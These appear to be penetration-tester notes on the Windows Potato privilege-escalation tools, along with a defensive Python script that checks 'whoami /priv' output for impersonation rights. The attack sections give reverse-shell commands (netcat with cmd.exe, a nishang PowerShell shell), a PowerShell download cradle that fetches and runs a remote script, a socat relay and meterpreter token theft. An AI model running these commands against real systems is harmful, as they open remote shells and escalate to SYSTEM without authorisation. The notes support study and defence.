Juicy Potato, Rotten Potato (NG)

Required privs

(show privs via whoami /priv)
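Added example for triaging that whoami /priv output (not part of these notes or of any Potato project): the whole Potato family depends on the token holding SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, so the script below parses the table whoami /priv prints and reports whether either right is present. The sample output embedded in the script is constructed in the layout whoami /priv uses, not captured from a real host; the function and constant names are my own.

```python
"""Triage `whoami /priv` output for Potato-style token-impersonation exposure.

Added example, not code from the original notes or from any Potato tool.
`whoami /priv` lists only the privileges that are actually in the token, so a
right that is absent from the table is not held at all.
"""

# Rights the Potato tools rely on. A privilege shown as "Disabled" still
# counts: it is in the token and the process can enable it on its own.
POTATO_RIGHTS = {
    "SeImpersonatePrivilege": "Impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "Replace a process level token",
}

# Constructed sample (typical service / IIS app-pool token), in the exact
# layout `whoami /priv` prints; not captured from a real machine.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: {"description": ..., "state": ...}}.

    Rows start after the '=====' separator line. Privilege names and states
    never contain spaces, so the first and last whitespace-separated tokens
    are reliable; everything in between is the free-text description.
    """
    lines = text.splitlines()
    try:
        start = next(i for i, line in enumerate(lines) if line.startswith("=")) + 1
    except StopIteration:
        raise ValueError("not whoami /priv output: separator row missing")
    privs = {}
    for line in lines[start:]:
        parts = line.split()
        if len(parts) < 2:
            continue  # blank or truncated row
        name, state = parts[0], parts[-1]
        privs[name] = {"description": " ".join(parts[1:-1]), "state": state}
    return privs


def potato_exposure(privs):
    """Potato-relevant rights present in the token, as (name, state) pairs."""
    return [(name, privs[name]["state"]) for name in POTATO_RIGHTS if name in privs]


def report(text):
    """One-line verdict a defender can act on."""
    exposure = potato_exposure(parse_whoami_priv(text))
    if not exposure:
        return "no impersonation/primary-token rights: Potato-style escalation not available"
    held = ", ".join(f"{name} ({state})" for name, state in exposure)
    return (f"token holds {held}; remove the user right from this service account "
            "or run the service under a less privileged account")


if __name__ == "__main__":
    print(report(SAMPLE_WHOAMI_PRIV))
```

Run it against the real thing with `whoami /priv > priv.txt` on the host and `report(open("priv.txt").read())`. The mitigation side is the "Impersonate a client after authentication" and "Replace a process level token" user rights in local security policy or GPO: a service account that does not need them should not hold them.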


RoguePotato: Another Windows Local Privilege Escalation from Service Account to System
Set up relay (can run e.g. on the attacking machine)
socat tcp-listen:135,reuseaddr,fork tcp:<target-ip>:9999
Set up listener
nc -nlvp 1337
Run exploit
RoguePotato.exe -r <relay-ip> -e "nc.exe <local-ip> 1337 -e cmd.exe" -l 9999


JuicyPotato (Releases · ohpe/juicy-potato · GitHub): A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Account to NT AUTHORITY\SYSTEM.
⚠️ **Microsoft patched this vulnerability in Windows version 1809 / build 17763** ⚠️ (works until 1803 / 17134)
Using the nishang reverse shell (Invoke-PowerShellTcp.ps1)
-> append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> to the end of the file so the shell starts automatically when the script is loaded
Create and upload a helper .bat file that runs the PowerShell download cradle:
cmd /c powershell.exe -ExecutionPolicy Bypass -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
Start listener
nc -nlvp <port>
.\JuicyPotato.exe -t * -p C:\Users\<user>\Documents\shell.bat -l 1234
-> Currently unsure why -l is needed
⚠️ Troubleshooting ⚠️
If it does not work (e.g. error 10038), try another CLSID with
-c '{<cls-id>}'


RottenPotatoNG: New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools.
In msf meterpreter (multi/handler):
upload /path/to/rottenpotato.exe
execute -cH -f rottenpotato.exe
```
load incognito
list_tokens -u
```
